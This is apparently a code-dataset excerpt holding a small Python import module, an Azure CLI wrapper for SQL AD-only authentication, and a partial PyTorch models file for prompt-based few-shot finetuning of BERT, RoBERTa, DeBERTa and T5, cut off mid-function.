|
[
"Apache-2.0"
] | null | null | null |
from .na_taric_top import *
from .na_taric_jng import *
from .na_taric_mid import *
from .na_taric_bot import *
from .na_taric_sup import *
| 24.166667
| 28
| 0.758621
| 25
| 145
| 4
| 0.36
| 0.3
| 0.55
| 0.68
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.172414
| 145
| 5
| 29
| 29
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e88ca5160b9905fa6dc00392239a829d5dc0a264
| 1,439
|
py
|
Python
|
pyaz/sql/server/ad_only_auth/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | null | null | null |
pyaz/sql/server/ad_only_auth/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | null | null | null |
pyaz/sql/server/ad_only_auth/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | 1
|
2022-02-03T09:12:01.000Z
|
2022-02-03T09:12:01.000Z
|
from .... pyaz_utils import _call_az
def disable(name, resource_group):
    '''
    Disable Azure Active Directory only Authentication for this Server.

    Required Parameters:
    - name -- Name of the Azure SQL server. You can configure the default using `az configure --defaults sql-server=<name>`
    - resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
    '''
    # locals() is passed verbatim as the CLI argument map: it must contain
    # exactly the declared parameters. Do NOT introduce any local variable
    # before this call, or it would be forwarded as an extra argument.
    return _call_az("az sql server ad-only-auth disable", locals())
def enable(name, resource_group):
    '''
    Enable Azure Active Directory only Authentication for this Server.

    Required Parameters:
    - name -- Name of the Azure SQL server. You can configure the default using `az configure --defaults sql-server=<name>`
    - resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
    '''
    # locals() is forwarded as the CLI argument map — keep the body free of
    # extra locals (see disable()).
    return _call_az("az sql server ad-only-auth enable", locals())
def get(name, resource_group):
    '''
    Get a specific Azure Active Directory only Authentication property.

    Required Parameters:
    - name -- Name of the Azure SQL server. You can configure the default using `az configure --defaults sql-server=<name>`
    - resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
    '''
    # locals() is forwarded as the CLI argument map — keep the body free of
    # extra locals (see disable()).
    return _call_az("az sql server ad-only-auth get", locals())
| 41.114286
| 128
| 0.7123
| 198
| 1,439
| 5.10101
| 0.19697
| 0.115842
| 0.10099
| 0.106931
| 0.833663
| 0.79703
| 0.79703
| 0.79703
| 0.79703
| 0.79703
| 0
| 0
| 0.19319
| 1,439
| 34
| 129
| 42.323529
| 0.86994
| 0.694927
| 0
| 0
| 0
| 0
| 0.272472
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0
| 0.142857
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
e8cee3fd645e9daeeefe3e537d892c0e0e3f825e
| 63,086
|
py
|
Python
|
src/models.py
|
microsoft/LiST
|
c8803e95593579c71c061d02e92c7d8501ba9e08
|
[
"MIT"
] | 21
|
2021-10-18T22:47:11.000Z
|
2022-03-14T17:06:31.000Z
|
src/models.py
|
microsoft/LiST
|
c8803e95593579c71c061d02e92c7d8501ba9e08
|
[
"MIT"
] | 6
|
2021-10-18T21:21:21.000Z
|
2022-03-11T18:28:03.000Z
|
src/models.py
|
microsoft/LiST
|
c8803e95593579c71c061d02e92c7d8501ba9e08
|
[
"MIT"
] | 4
|
2021-11-11T06:52:45.000Z
|
2022-03-11T17:25:45.000Z
|
"""Custom models for few-shot learning specific operations."""
import torch
import torch.nn as nn
import transformers
import torch.nn.functional as F
from transformers import AutoConfig, AutoModelForSequenceClassification, AutoTokenizer, EvalPrediction
from transformers.models.t5.modeling_t5 import T5ForConditionalGeneration
from transformers.models.bert.modeling_bert import BertPreTrainedModel, BertForSequenceClassification, BertModel, BertOnlyMLMHead
from transformers.models.roberta.modeling_roberta import RobertaForSequenceClassification, RobertaModel, RobertaLMHead, RobertaClassificationHead
from transformers.models.deberta_v2.modeling_deberta_v2 import DebertaV2PreTrainedModel, DebertaV2Model, StableDropout, ContextPooler, DebertaV2OnlyMLMHead
from transformers.models.deberta.modeling_deberta import DebertaPreTrainedModel, DebertaModel, StableDropout, ContextPooler, DebertaOnlyMLMHead
from transformers.modeling_outputs import SequenceClassifierOutput
from transformers.modeling_utils import PreTrainedModel
from loss import stable_kl, CeCriterion, KlCriterion, entropy, SymKlCriterion, ContrastiveLoss
from processors import processors_mapping, num_labels_mapping, output_modes_mapping, compute_metrics_mapping, bound_mapping
import logging
from model_adaptation import RobertaAdaModel, BertAdaModel
import os
logger = logging.getLogger(__name__)
def generate_noise(embed, mask, epsilon=1e-5):
    """Create a small random perturbation tensor shaped like ``embed``.

    Args:
        embed: reference tensor; the noise copies its size, dtype and device.
        mask: unused in the computation; kept for call-site compatibility.
        epsilon: scale factor applied to the standard-normal sample.

    Returns:
        A leaf tensor with ``requires_grad=True`` so the adversarial training
        step can take gradients with respect to the noise itself.
    """
    noise = embed.data.new(embed.size()).normal_(0, 1) * epsilon
    # BUGFIX: the original called noise.detach() without assigning the result,
    # which is a no-op. Assigning makes the intent (a fresh autograd leaf)
    # explicit; the observable behavior is unchanged because the tensor had
    # no grad history to begin with.
    noise = noise.detach()
    noise.requires_grad_()
    return noise
def norm_grad(grad, eff_grad=None, sentence_level=False, norm_p='max', epsilon=1e-5):
    """Normalize an adversarial gradient into a unit-ish update direction.

    Args:
        grad: gradient tensor to normalize.
        eff_grad: optional "effective" gradient to normalize with the same
            scale (only used in the default ``norm_p='max'`` token-level path).
        sentence_level: normalize over the last two dims instead of the last.
        norm_p: 'l2', 'l1', or anything else for max-abs normalization.
        epsilon: numerical stabilizer added to every denominator.

    Returns:
        (direction, eff_direction) — ``eff_direction`` is ``None`` whenever it
        is not computed for the chosen branch.

    BUGFIX: the original only ever assigned ``eff_direction`` in the
    max-norm, token-level branch, so 'l1'/'l2' (and sentence-level max)
    raised UnboundLocalError at the return; it also divided ``None`` when
    ``eff_grad`` was omitted. Both are now guarded.
    """
    eff_direction = None
    if norm_p == 'l2':
        if sentence_level:
            direction = grad / (torch.norm(grad, dim=(-2, -1), keepdim=True) + epsilon)
        else:
            direction = grad / (torch.norm(grad, dim=-1, keepdim=True) + epsilon)
    elif norm_p == 'l1':
        direction = grad.sign()
    else:
        if sentence_level:
            # NOTE(review): Tensor.max with a tuple dim is not supported by
            # older torch versions — confirm this branch is exercised.
            direction = grad / (grad.abs().max((-2, -1), keepdim=True)[0] + epsilon)
        else:
            # Hoist the shared denominator so grad and eff_grad use the
            # identical scale, as the original intended.
            scale = grad.abs().max(-1, keepdim=True)[0] + epsilon
            direction = grad / scale
            if eff_grad is not None:
                eff_direction = eff_grad / scale
    return direction, eff_direction
def resize_token_type_embeddings(model, new_num_types: int, random_segment: bool):
    """Replace BERT's token-type (segment) embedding table with a larger one.

    Args:
        model: a model exposing a ``bert`` submodule (anything else raises
            NotImplementedError).
        new_num_types: number of rows in the replacement embedding table.
        random_segment: when False, the pretrained rows are copied into the
            head of the new table; when True all rows keep their random init.
    """
    if not hasattr(model, 'bert'):
        raise NotImplementedError
    old_embeddings = model.bert.embeddings.token_type_embeddings

    embed_dim = old_embeddings.weight.size(1)
    new_embeddings = nn.Embedding(new_num_types, embed_dim)
    if not random_segment:
        # Preserve the pretrained segment vectors; only the extra rows stay
        # randomly initialized.
        num_old_rows = old_embeddings.weight.size(0)
        new_embeddings.weight.data[:num_old_rows] = old_embeddings.weight.data

    model.config.type_vocab_size = new_num_types
    if not hasattr(model, 'bert'):
        raise NotImplementedError
    model.bert.embeddings.token_type_embeddings = new_embeddings
class LMForPromptFinetuning(BertPreTrainedModel):
    """Dispatcher that wraps a model-type-specific prompt-finetuning backbone.

    Based on ``config.model_type`` it instantiates one of the
    Roberta/Bert/Deberta/Debertav2/T5 ``*ForPromptFinetuning`` models as
    ``self.lm_model``, loads its pretrained weights, and delegates
    encoding/forward to it, optionally adding continuous-prompt embeddings
    and adapter initialization.
    """

    def __init__(self, config, model_args, data_args):
        super().__init__(config)
        self.model_args = model_args
        self.data_args = data_args
        self.config = config

        # Create config
        num_labels = num_labels_mapping[data_args.task_name]
        self.num_labels = num_labels
        config.adapter_dim = model_args.adapter_dim
        config.adapter_alpha = model_args.adapter_alpha
        config.adapter_choice = model_args.adapter_choice
        self.config = config

        # Pick the backbone class from the model type; only prompt-based
        # few-shot types are supported. T5 is constructed immediately, the
        # others are loaded via from_pretrained below.
        if 'prompt' in model_args.few_shot_type:
            if config.model_type == 'roberta':
                model_fn = RobertaForPromptFinetuning
            elif config.model_type == 'bert':
                model_fn = BertForPromptFinetuning
            elif config.model_type == 'deberta':
                model_fn = DebertaForPromptFinetuning
            elif config.model_type == 'deberta-v2':
                model_fn = Debertav2ForPromptFinetuning
            elif config.model_type == 't5':
                self.lm_model = T5ForPromptFinetuning(config)
            else:
                raise NotImplementedError
        else:
            raise NotImplementedError

        if config.model_type == 't5':
            # T5 keeps its backbone in self.lm_model.T5; reload its weights.
            self.lm_model.T5 = self.lm_model.T5.from_pretrained(
                model_args.model_name_or_path,
                from_tf=bool(".ckpt" in model_args.model_name_or_path),
                config=config,
                cache_dir=model_args.cache_dir,
            )
        else:
            self.lm_model = model_fn.from_pretrained(
                model_args.model_name_or_path,
                from_tf=bool(".ckpt" in model_args.model_name_or_path),
                config=config,
                cache_dir=model_args.cache_dir,
            )

        # Pass dataset and argument information to the model
        if data_args.prompt:
            # NOTE(review): hard CUDA dependency — .cuda() fails on CPU-only
            # machines; confirm this is intended.
            self.lm_model.label_word_list = torch.tensor(data_args.label_word_list).long().cuda()
        if output_modes_mapping[data_args.task_name] == 'regression':
            # lower / upper bounds
            self.lm_model.lb, self.lm_model.ub = bound_mapping[data_args.task_name]

        self.lm_model.model_args = model_args
        self.lm_model.data_args = data_args
        self.hidden_size = config.hidden_size
        if self.data_args.continuous_prompt == 1:
            self.prompt_embeddings = torch.nn.Embedding(self.data_args.prompt_length, self.hidden_size)
        else:
            # NOTE(review): the second assignment immediately overwrites the
            # None, so both branches end with an Embedding — looks like
            # leftover code; confirm nothing relies on None here.
            self.prompt_embeddings = None
            self.prompt_embeddings = torch.nn.Embedding(self.data_args.prompt_length, self.hidden_size)

        if self.model_args.adapter_choice != 'none':
            self.init_adapter(std=self.model_args.adapter_init_std)
        self.prompt_encoder = None
        if self.data_args.continuous_prompt == 1:
            self.init_embedding()

    def init_adapter(self, std):
        """Initialize 'adapter_proj' weights in-place: identity for the
        'simple' adapter choice, plus optional Gaussian noise of stddev ``std``."""
        with torch.no_grad():
            for name, param in self.lm_model.named_parameters():
                init_value = 0
                if 'adapter_proj' in name:
                    if self.model_args.adapter_choice == 'simple':
                        # Identity init keeps the adapter a no-op at start.
                        init_value = torch.eye(param.size(0))
                    if std > 0:
                        init_value += torch.normal(0, std, size=param.size())
                    param.copy_(init_value)

    def freeze_lm(self):
        """Freeze every backbone parameter."""
        for name, param in self.lm_model.named_parameters():
            param.requires_grad = False

    def freeze_lm_encoder(self):
        """Freeze everything except the LM head / cls head (names printed)."""
        for name, param in self.lm_model.named_parameters():
            if 'lm_head' in name or ('cls' in name):
                print(name)
                continue
            param.requires_grad = False

    def freeze_lm_finetune_bias(self):
        """Freeze everything except bias terms (BitFit-style; names printed)."""
        for name, param in self.lm_model.named_parameters():
            if "bias" in name:
                print(name)
                continue
            param.requires_grad = False

    def freeze_lm_component(self, component):
        """Freeze all backbone parameters except the named component.

        ``component`` is matched by substring: 'attention' (optionally
        narrowed with 'output'), 'feedforward' (optionally 'output' /
        'intermediate'), 'adapter', 'embedding', 'bias', 'head', or
        'prompt_emb'. Most branches re-enable the classification head after
        freezing.
        """
        if 'attention' in component:
            for name, param in self.lm_model.named_parameters():
                if 'attention' in name:
                    if 'output' in component:
                        if 'output' in name:
                            continue
                    else:
                        continue
                param.requires_grad = False
            self.unfreeze_classification_head()
        elif 'feedforward' in component:
            for name, param in self.lm_model.named_parameters():
                if 'dense' in name and 'attention' not in name:
                    if 'output' in component:
                        if 'output' in name:
                            continue
                    else:
                        if 'intermediate' in component:
                            if 'intermediate' in name:
                                continue
                param.requires_grad = False
            self.unfreeze_classification_head()
        elif component == 'adapter':
            for name, param in self.lm_model.named_parameters():
                if 'adapter' in name:
                    continue
                param.requires_grad = False
            self.unfreeze_classification_head()
        elif 'embedding' in component:
            for name, param in self.lm_model.named_parameters():
                if 'embedding' in name:
                    continue
                param.requires_grad = False
            self.unfreeze_classification_head()
        elif 'bias' in component:
            for name, param in self.lm_model.named_parameters():
                if 'bias' in name:
                    continue
                param.requires_grad = False
            self.unfreeze_classification_head()
        elif 'head' in component:
            for name, param in self.lm_model.named_parameters():
                param.requires_grad = False
            self.unfreeze_classification_head()
        elif "prompt_emb" in component:
            for name, param in self.lm_model.named_parameters():
                if 'prompt_emb' in name:
                    continue
                param.requires_grad = False

    def unfreeze_classification_head(self):
        """Re-enable gradients for lm_head / cls / classifier parameters."""
        for name, param in self.lm_model.named_parameters():
            if 'lm_head' in name or ('cls' in name) or ('classifier' in name):
                param.requires_grad = True

    def freeeze_lm_k_layers(self, k):
        """Freeze all but the output dense layers of the top ``k`` layers.

        NOTE(review): method name has a typo ('freeeze') and the layer index
        arithmetic (23 - i) assumes a 24-layer model — confirm with callers
        before renaming or generalizing.
        """
        keep_layers = []
        update_parameters = []
        for i in range(k):
            keep_layers.append('layer.'+str(23-i))

        for name, param in self.lm_model.named_parameters():
            update = False
            for layer_num in keep_layers:
                if layer_num in name:
                    if 'dense' in name and 'attention' not in name:
                        if 'output' in name:
                            print(name)
                            update_parameters.append(name)
                            update = True
            if not update:
                param.requires_grad = False
        self.unfreeze_classification_head()

    def unfreeze_lm(self):
        """Enable gradients for every backbone parameter."""
        for param in self.lm_model.parameters():
            param.requires_grad = True

    def init_embedding(self):
        """Re-initialize prompt embeddings from random vocabulary embeddings
        (token ids sampled in [100, vocab_size))."""
        rand_id = torch.randint(100, self.config.vocab_size, (self.data_args.prompt_length,)).long()
        rand_emb = self.lm_model.embed_encode(rand_id)
        self.prompt_embeddings = self.prompt_embeddings.from_pretrained(rand_emb, freeze=False)

    def get_adv_loss(self,
                     input_ids=None,
                     attention_mask=None,
                     mask_pos=None,
                     labels=None,
                     inputs_embeds=None):
        """SMART-style adversarial loss: perturb input embeddings with noise
        ascended along the KL gradient for ``self.K`` steps, then score the
        divergence between clean and perturbed logits.

        NOTE(review): reads self.K / self.step_size / self.adv_lc, which are
        not set in this class's __init__ (they exist on the Roberta backbone)
        — confirm how this method is reached.
        """
        logits, sequence_mask_output = self.encode(input_ids, attention_mask, mask_pos, inputs_embeds)
        input_args = [input_ids, attention_mask, mask_pos, labels, None, 1]
        embed = self.forward(*input_args)
        noise = generate_noise(embed, attention_mask)
        for step in range(0, self.K):
            vat_args = [input_ids, attention_mask, mask_pos, labels, embed + noise, 2]
            adv_logits, _ = self.forward(*vat_args)
            adv_loss = stable_kl(adv_logits, logits.detach(), reduce=False)
            try:
                delta_grad, = torch.autograd.grad(adv_loss, noise, only_inputs=True, retain_graph=False)
            except:
                # NOTE(review): bare except dropping into pdb — debugging
                # leftover; after continuing, delta_grad is unbound.
                import pdb
                pdb.set_trace()
            norm = delta_grad.norm()
            if (torch.isnan(norm) or torch.isinf(norm)):
                # Bail out rather than propagate a broken gradient.
                return 0
            eff_delta_grad = delta_grad * self.step_size
            delta_grad, eff_noise = norm_grad(delta_grad, eff_grad=eff_delta_grad)
            noise = noise + delta_grad * self.step_size
            # noise, eff_noise = self._norm_grad(delta_grad, eff_grad=eff_delta_grad, sentence_level=self.norm_level)
            noise = noise.detach()
            noise.requires_grad_()
        vat_args = [input_ids, attention_mask, mask_pos, labels, embed + noise, 2]
        adv_logits, sequence_mask_output = self.forward(*vat_args)
        # ori_args = model(*ori_args)
        # aug_args = [input_ids, token_type_ids, attention_mask, premise_mask, hyp_mask, task_id, 2, (embed + native_noise).detach()]
        adv_loss = self.adv_lc(adv_logits, logits, reduction='none')
        return adv_loss

    def embed_encode(self, input_ids):
        """Look up word embeddings for ``input_ids`` from the backbone."""
        embedding_output = self.lm_model.embeddings.word_embeddings(input_ids)
        return embedding_output

    def encode(self, input_ids=None, attention_mask=None, mask_pos=None, inputs_embeds=None, return_full_softmax=False):
        """Run the backbone and score label words at the <mask> position.

        Returns (label logits, mask-position hidden state), or the full
        vocabulary scores when ``return_full_softmax`` is set.

        NOTE(review): uses self.lm_head / self.classifier, which belong to
        the wrapped backbone rather than this class — confirm call path.
        """
        # import pdb
        # pdb.set_trace()
        batch_size = input_ids.size(0)

        if mask_pos is not None:
            mask_pos = mask_pos.squeeze()

        # Encode everything
        if inputs_embeds is None:
            outputs = self.lm_model(
                input_ids,
                attention_mask=attention_mask
            )
        else:
            outputs = self.lm_model(
                None,
                attention_mask=attention_mask,
                inputs_embeds=inputs_embeds
            )

        # Get <mask> token representation
        sequence_output, pooled_output = outputs[:2]
        sequence_mask_output = sequence_output[torch.arange(sequence_output.size(0)), mask_pos]

        # Logits over vocabulary tokens
        prediction_mask_scores = self.lm_head(sequence_mask_output)

        # sequence_mask_output = self.lm_head.dense(sequence_mask_output)

        # Exit early and only return mask logits.
        if return_full_softmax:
            return prediction_mask_scores

        # Return logits for each label
        logits = []
        for label_id in range(len(self.label_word_list)):
            logits.append(prediction_mask_scores[:, self.label_word_list[label_id]].unsqueeze(-1))
        logits = torch.cat(logits, -1)

        # Regression task
        if self.config.num_labels == 1:
            logsoftmax = nn.LogSoftmax(-1)
            logits = logsoftmax(logits)  # Log prob of right polarity

        if self.model_args.hybrid == 1:
            cls_logits = self.classifier(sequence_output)
            return (logits, cls_logits), sequence_mask_output

        return logits, sequence_mask_output

    def generate_continuous_prompt_inputs(self, input_ids, block_flag):
        """Splice trained prompt embeddings into the word embeddings at the
        positions where ``block_flag == 1``."""
        inputs_embeds = self.lm_model.embed_encode(input_ids)
        bz = inputs_embeds.shape[0]

        try:
            replace_embeds = self.prompt_embeddings(
                torch.LongTensor(list(range(self.data_args.prompt_length))).to(inputs_embeds.device))
        except:
            # NOTE(review): pdb fallback — debugging leftover; the retry
            # without .to(device) suggests a historical device mismatch.
            import pdb
            pdb.set_trace()
            replace_embeds = self.prompt_embeddings(
                torch.LongTensor(list(range(self.data_args.prompt_length))))

        replace_embeds = replace_embeds.unsqueeze(0)  # [batch_size, prompt_length, embed_size]

        if self.prompt_encoder is not None:
            replace_embeds = self.prompt_encoder(replace_embeds)

        # Column 1 of nonzero() holds the sequence position of each flag hit.
        blocked_indices = (block_flag == 1).nonzero(as_tuple=False).reshape((bz, self.data_args.prompt_length, 2))[:, :, 1]

        for bidx in range(bz):
            for i in range(blocked_indices.shape[1]):
                inputs_embeds[bidx, blocked_indices[bidx, i], :] = replace_embeds[:, i, :].squeeze()

        return inputs_embeds

    def forward(
            self,
            input_ids=None,
            attention_mask=None,
            token_type_ids=None,
            mask_pos=None,
            labels=None,
            inputs_embeds=None,
            fwd_type=0,
            block_flag=None,
            *args,
            **kwargs
    ):
        """Delegate to the backbone and compute the task loss.

        ``fwd_type`` selects the mode: 0 = loss + logits, 1 = return input
        embeddings only, 2 = encode from the given ``inputs_embeds``,
        3 = full-vocab mask scores, 4 = logits + mask representation
        without loss.
        """
        if 't5' in self.config.model_type:
            logits, sequence_mask_output = self.lm_model.encode(input_ids=input_ids, attention_mask=attention_mask, labels=labels)
        else:
            if fwd_type == 2:
                assert inputs_embeds is not None
                if token_type_ids is not None:
                    return self.lm_model.encode(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, mask_pos=mask_pos,
                                                inputs_embeds=inputs_embeds)
                else:
                    return self.lm_model.encode(input_ids=input_ids, attention_mask=attention_mask, mask_pos=mask_pos,
                                                inputs_embeds=inputs_embeds)

            elif fwd_type == 1:
                return self.lm_model.embed_encode(input_ids)

            if self.data_args.continuous_prompt == 1 and block_flag is not None and block_flag[0] is not None:
                inputs_embeds = self.generate_continuous_prompt_inputs(input_ids, block_flag)

            if fwd_type == 3:
                if token_type_ids is not None:
                    prediction_mask_scores = self.lm_model.encode(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, mask_pos=mask_pos,
                                                                  inputs_embeds=inputs_embeds, return_full_softmax=True)
                else:
                    prediction_mask_scores = self.lm_model.encode(input_ids, attention_mask, mask_pos, inputs_embeds, return_full_softmax=True)
                if labels is not None:
                    return torch.zeros(1, out=prediction_mask_scores.new()), prediction_mask_scores
                return prediction_mask_scores

            if token_type_ids is not None:
                logits, sequence_mask_output = self.lm_model.encode(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, mask_pos=mask_pos,
                                                                    inputs_embeds=inputs_embeds)
            else:
                logits, sequence_mask_output = self.lm_model.encode(input_ids, attention_mask, mask_pos, inputs_embeds)

        if fwd_type == 4:
            return logits, sequence_mask_output

        loss = None
        if labels is not None:
            if self.num_labels == 1:
                # Regression task
                loss_fct = nn.KLDivLoss(log_target=True)
                # Map the scalar target into a two-point distribution over
                # [lb, ub] and match it with KL.
                labels = torch.stack([1 - (labels.view(-1) - self.lb) / (self.ub - self.lb),
                                      (labels.view(-1) - self.lb) / (self.ub - self.lb)], -1)
                loss = loss_fct(logits.view(-1, 2), labels)
            else:
                if labels.shape == logits.shape:
                    # Soft labels: KL between predicted and target distributions.
                    loss = F.kl_div(F.log_softmax(logits, dim=-1, dtype=torch.float32),
                                    labels, reduction='batchmean')
                else:
                    loss_fct = nn.CrossEntropyLoss()
                    loss = loss_fct(logits.view(-1, logits.size(-1)), labels.view(-1))

        output = (logits,)
        if self.num_labels == 1:
            # Regression output
            output = (torch.exp(logits[..., 1].unsqueeze(-1)) * (self.ub - self.lb) + self.lb,)

        return ((loss,) + output) if loss is not None else output

    def from_pretrained(self, pretrained_model_name_or_path, *model_args, **kwargs):
        """Reload backbone weights and re-attach prompt/task metadata.

        NOTE(review): this is an *instance* method shadowing the classmethod
        ``PreTrainedModel.from_pretrained`` — it must be called on an
        already-constructed wrapper.
        """
        self.lm_model = self.lm_model.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)
        if self.data_args.prompt:
            self.lm_model.label_word_list = torch.tensor(self.data_args.label_word_list).long().cuda()
        if output_modes_mapping[self.data_args.task_name] == 'regression':
            # lower / upper bounds
            self.lm_model.lb, self.lm_model.ub = bound_mapping[self.data_args.task_name]
        self.lm_model.model_args = self.model_args
        self.lm_model.data_args = self.data_args
        return self

    def load_model(self, checkpoint):
        """Load a checkpoint state dict from disk if the path exists
        (non-strict, so partial checkpoints are tolerated)."""
        if os.path.isfile(checkpoint):
            model_state_dict = torch.load(checkpoint)
            self.load_state_dict(model_state_dict, strict=False)
class BertForSequenceClassification(BertPreTrainedModel):
    """BERT encoder with a pooled-output classification/regression head.

    Mirrors the HuggingFace reference implementation: the loss function is
    chosen from ``config.problem_type`` (regression / single-label /
    multi-label), which is inferred on first use from ``num_labels`` and the
    label dtype.
    """

    def __init__(self, config):
        super().__init__(config)
        self.num_labels = config.num_labels
        self.config = config

        self.bert = BertModel(config)
        # Prefer an explicit classifier dropout; fall back to the encoder's
        # hidden dropout probability.
        classifier_dropout = (
            config.classifier_dropout if config.classifier_dropout is not None else config.hidden_dropout_prob
        )
        self.dropout = nn.Dropout(classifier_dropout)
        self.classifier = nn.Linear(config.hidden_size, config.num_labels)

        self.init_weights()

    def forward(
            self,
            input_ids=None,
            attention_mask=None,
            token_type_ids=None,
            position_ids=None,
            head_mask=None,
            inputs_embeds=None,
            labels=None,
            output_attentions=None,
            output_hidden_states=None,
            return_dict=None,
    ):
        r"""
        labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`):
            Labels for computing the sequence classification/regression loss. Indices should be in :obj:`[0, ...,
            config.num_labels - 1]`. If :obj:`config.num_labels == 1` a regression loss is computed (Mean-Square loss),
            If :obj:`config.num_labels > 1` a classification loss is computed (Cross-Entropy).
        """
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict

        outputs = self.bert(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )

        pooled_output = outputs[1]
        pooled_output = self.dropout(pooled_output)
        logits = self.classifier(pooled_output)

        loss = None
        if labels is not None:
            if self.config.problem_type is None:
                # Infer the problem type once from num_labels / label dtype.
                if self.num_labels == 1:
                    self.config.problem_type = "regression"
                elif self.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int):
                    self.config.problem_type = "single_label_classification"
                else:
                    self.config.problem_type = "multi_label_classification"

            if self.config.problem_type == "regression":
                # BUGFIX: the original referenced bare MSELoss (and
                # CrossEntropyLoss / BCEWithLogitsLoss below), which are not
                # imported anywhere in this module — computing a loss raised
                # NameError. Qualify them via the already-imported ``nn``.
                loss_fct = nn.MSELoss()
                if self.num_labels == 1:
                    loss = loss_fct(logits.squeeze(), labels.squeeze())
                else:
                    loss = loss_fct(logits, labels)
            elif self.config.problem_type == "single_label_classification":
                loss_fct = nn.CrossEntropyLoss()
                loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
            elif self.config.problem_type == "multi_label_classification":
                loss_fct = nn.BCEWithLogitsLoss()
                loss = loss_fct(logits, labels)

        if not return_dict:
            output = (logits,) + outputs[2:]
            return ((loss,) + output) if loss is not None else output

        return SequenceClassifierOutput(
            loss=loss,
            logits=logits,
            hidden_states=outputs.hidden_states,
            attentions=outputs.attentions,
        )
class T5ForPromptFinetuning(T5ForConditionalGeneration):
    """T5 backbone for prompt finetuning: decodes with a fixed sentinel label
    pattern and scores the label words at decoder position 2."""

    def __init__(self, config):
        super().__init__(config)
        self.T5 = T5ForConditionalGeneration(config)

        # These attributes should be assigned once the model is initialized
        self.model_args = None
        self.data_args = None
        self.label_word_list = None

        # For regression
        self.lb = None
        self.ub = None

        # For label search.
        self.return_full_softmax = None

    def get_labels(self, input_ids):
        """Build the constant decoder label sequence ``[3, 32099, 1]``
        (token, <extra_id_0> sentinel, EOS) for every item in the batch."""
        batch_size = input_ids.size(0)
        # new_labels = torch.tensor([3,32099,1] * batch_size).to(labels.device)
        # prefix = torch.tensor([32099] * batch_size).to(labels.device)
        # ending = torch.tensor([1] * batch_size).to(labels.device)
        # prefix_labels = torch.cat((start.unsqueeze(1), prefix.unsqueeze(1)), 1)
        # prefix_labels = torch.cat(( prefix_labels, labels.unsqueeze(1)), 1)
        new_labels = torch.tensor([3, 32099,1]).to(input_ids.device).unsqueeze(0).repeat(batch_size, 1)
        return new_labels

    def encode(self, input_ids=None, attention_mask=None, token_type_ids=None, mask_pos=None, inputs_embeds=None,
               return_full_softmax=False, labels=None):
        """Return (label-word logits, full vocab scores at position 2).

        NOTE(review): ``outputs`` is only assigned when ``labels`` is given;
        calling with ``labels=None`` raises NameError — all current call
        sites appear to pass labels, but confirm before reuse.
        """
        if labels is not None:
            t5_labels = self.get_labels(input_ids)
            outputs = self.T5(input_ids=input_ids, attention_mask=attention_mask, labels=t5_labels)
        # Position 2 corresponds to the slot after the sentinel in the
        # fixed label pattern built by get_labels().
        prediction_mask_scores = outputs.logits[:, 2, :]
        logits = []
        for label_id in range(len(self.label_word_list)):
            logits.append(prediction_mask_scores[:, self.label_word_list[label_id]].unsqueeze(-1))
        logits = torch.cat(logits, -1)
        return logits, prediction_mask_scores
class BertForPromptFinetuning(BertPreTrainedModel):
    """BERT backbone for prompt finetuning: scores label words at the <mask>
    position via the MLM head, with optional adapter variant."""

    def __init__(self, config):
        super().__init__(config)
        self.num_labels = config.num_labels
        if config.adapter_choice != 'none':
            self.bert = BertAdaModel(config)
        else:
            self.bert = BertModel(config)
        self.cls = BertOnlyMLMHead(config)
        self.init_weights()

        # These attributes should be assigned once the model is initialized
        self.model_args = None
        self.data_args = None
        self.label_word_list = None

        # For regression
        self.lb = None
        self.ub = None

        # For label search.
        self.return_full_softmax = None

    def embed_encode(self, input_ids):
        """Look up word embeddings for ``input_ids``."""
        embedding_output = self.bert.embeddings.word_embeddings(input_ids)
        return embedding_output

    def encode(self, input_ids=None, attention_mask=None, token_type_ids=None, mask_pos=None, inputs_embeds=None, return_full_softmax=False):
        """Run BERT and score the label words at the <mask> position.

        Returns (label logits, mask-position hidden state); full vocabulary
        scores instead when ``return_full_softmax`` is set.
        """
        batch_size = input_ids.size(0)

        if mask_pos is not None:
            mask_pos = mask_pos.squeeze()

        # Encode everything
        if inputs_embeds is None:
            outputs = self.bert(
                input_ids,
                attention_mask=attention_mask,
                token_type_ids=token_type_ids
            )
        else:
            outputs = self.bert(
                None,
                attention_mask=attention_mask,
                token_type_ids=token_type_ids,
                inputs_embeds=inputs_embeds
            )

        # Get <mask> token representation
        sequence_output, pooled_output = outputs[:2]
